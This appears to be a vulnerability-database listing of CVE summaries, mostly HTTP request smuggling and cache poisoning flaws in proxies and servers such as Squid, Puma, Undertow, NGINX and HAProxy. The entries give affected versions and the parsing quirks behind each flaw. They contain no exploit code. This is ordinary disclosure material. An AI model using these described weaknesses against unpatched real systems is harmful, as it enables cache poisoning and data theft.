CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
ATS negative cache option is vulnerable to a cache poisoning attack. If you have this option enabled, please upgrade or disable this feature. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected. |
An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Splitting attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the browser cache and any downstream caches with content from an arbitrary source. Squid uses a string search instead of parsing the Transfer-Encoding header to find chunked encoding. This allows an attacker to hide a second request inside Transfer-Encoding: it is interpreted by Squid as chunked and split out into a second request delivered upstream. Squid will then deliver two distinct responses to the client, corrupting any downstream caches. |
An issue was discovered in Squid before 4.13 and 5.x before 5.0.4. Due to incorrect data validation, HTTP Request Smuggling attacks may succeed against HTTP and HTTPS traffic. This leads to cache poisoning. This allows any client, including browser scripts, to bypass local security and poison the proxy cache and any downstream caches with content from an arbitrary source. When configured for relaxed header parsing (the default), Squid relays headers containing whitespace characters to upstream servers. When this occurs as a prefix to a Content-Length header, the frame length specified will be ignored by Squid (allowing for a conflicting length to be used from another Content-Length header) but relayed upstream. |
An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing "+\ "-" or an uncommon shell whitespace character prefix to the length field-value. |
An issue was discovered in OpenResty before 1.15.8.4. ngx_http_lua_subrequest.c allows HTTP request smuggling, as demonstrated by the ngx.location.capture API. |
An issue was discovered in GitLab 10.7.0 and later through 12.9.2. A Workhorse bypass could lead to job artifact uploads and file disclosure (Exposure of Sensitive Information) via request smuggling. |
An issue was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE) before 12.7.9, 12.8.x before 12.8.9, and 12.9.x before 12.9.3. A Workhorse bypass could lead to NuGet package and file disclosure (Exposure of Sensitive Information) via request smuggling. |
In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5. |
In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4. |
A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling. |
A flaw was discovered in all versions of Undertow before Undertow 2.2.0.Final, where HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own. |
Citrix Gateway 11.1, 12.0, and 12.1 allows Cache Poisoning. NOTE: Citrix disputes this as not a vulnerability. By default, Citrix ADC only caches static content served under certain URL paths for Citrix Gateway usage. No dynamic content is served under these paths, which implies that those cached pages would not change based on parameter values. All other data traffic going through Citrix Gateway are NOT cached by default |
Citrix Gateway 11.1, 12.0, and 12.1 has an Inconsistent Interpretation of HTTP Requests. NOTE: Citrix disputes the reported behavior as not a security issue. Citrix ADC only caches HTTP/1.1 traffic for performance optimization |
An issue was discovered in Mattermost Server before 5.12.0. Use of a Proxy HTTP header, rather than the source address in an IP packet header, for obtaining IP address information was mishandled. |
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. |
NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer. |
Silverstripe CMS sites through 4.4.4 which have opted into HTTP Cache Headers on responses served by the framework's HTTP layer can be vulnerable to web cache poisoning. Through modifying the X-Original-Url and X-HTTP-Method-Override headers, responses with malicious HTTP headers can return unexpected responses to other consumers of this cached response. Most other headers associated with web cache poisoning are already disabled through request hostname forgery whitelists. |
A Broken Access Control vulnerability in the D-Link DSL-2680 web administration interface (Firmware EU_1.03) allows an attacker to reboot the router by submitting a reboot.html GET request without being authenticated on the admin interface. |
An issue was discovered in Squid 3.x and 4.x through 4.8. It allows attackers to smuggle HTTP requests through frontend software to a Squid instance that splits the HTTP Request pipeline differently. The resulting Response messages corrupt caches (between a client and Squid) with attacker-controlled content at arbitrary URLs. Effects are isolated to software between the attacker client and Squid. There are no effects on Squid itself, nor on any upstream servers. The issue is related to a request header containing whitespace between a header name and a colon. |
A flaw was found in HAProxy before 2.0.6. In legacy mode, messages featuring a transfer-encoding header missing the "chunked" value were not being correctly rejected. The impact was limited but if combined with the "http-reuse always" setting, it could be used to help construct an HTTP request smuggling attack against a vulnerable component employing a lenient parser that would ignore the content-length header as soon as it saw a transfer-encoding one (even if not entirely valid according to the specification). |